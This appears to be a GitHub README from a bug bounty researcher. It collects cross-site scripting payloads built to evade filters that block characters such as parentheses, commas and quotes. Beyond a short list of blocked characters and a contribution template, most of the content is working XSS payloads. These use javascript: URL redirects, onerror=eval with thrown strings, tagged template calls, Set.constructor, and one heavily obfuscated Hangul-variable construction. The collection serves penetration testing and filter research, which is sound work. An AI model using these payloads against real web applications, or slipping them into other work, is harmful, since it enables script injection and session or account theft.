XSS Payload without Anything.
When I work for a company or on a bug bounty, the unexpected hurdle is a protection (XSS filter) against special characters in the JS (JavaScript) area. So I am devising a way to easily solve these problems, and this document is one part of that process.
Let's collect a lot of thoughts and solve our problems.
It is similar to "Payload all the things" in terms of collecting payloads, but I want to provide a list of payloads with special tags (without char, used char, other...). I plan to make it easy to search and to show which characters (or what they are made of) are unusable.
without char: () , '
XSS Payload
// usedchar:
// author:
// description:
I have selected special characters that are often blocked.
( )
{ }
,
"
'
`
[ ]
\
/
;
+
.
=
(template): () {} , " ' backtick [] \ / ; + . =
on Github.com
- Ctrl + F >
- find your problem char
- XSS
on hahwul.com
coming soon
location='JaVaScRiPt:prompt'+document.location.hash[1]+'45'+document.location.hash[2]
onerror=eval;throw'alert\x2845\x29';
prompt`45`
location='javaScriPt:alert\x2845\x29'
([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,ㅋ,,,ㅎ]=[!!하]+!하+하.ㅁ)[훌+=하+ㅎ+ㅋ+한+글+페+훌+한+하+글][훌](로+드+이+글+한+'(45)')()
[45].some.alert()
Set.constructor`alert\x2845\x29`
Submit the issue form or a pull request
XSS Payload:
WithOut:
Description:
or ...
Tweet with me @hahwul